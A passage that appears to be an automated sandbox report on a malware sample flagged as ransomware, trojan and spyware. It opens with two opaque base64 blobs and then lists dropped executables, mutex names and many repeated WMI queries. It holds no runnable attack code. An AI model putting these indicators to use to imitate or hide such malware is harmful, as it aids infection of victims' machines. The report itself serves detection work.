'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

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@128/242@0/33

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C530300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

3_2_6C530300

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\J6MUVVB3.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\3ceee625-5df7-4df1-9884-bc7a8a2fe79b

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

File created: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe

System information queried: HandleInformation

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
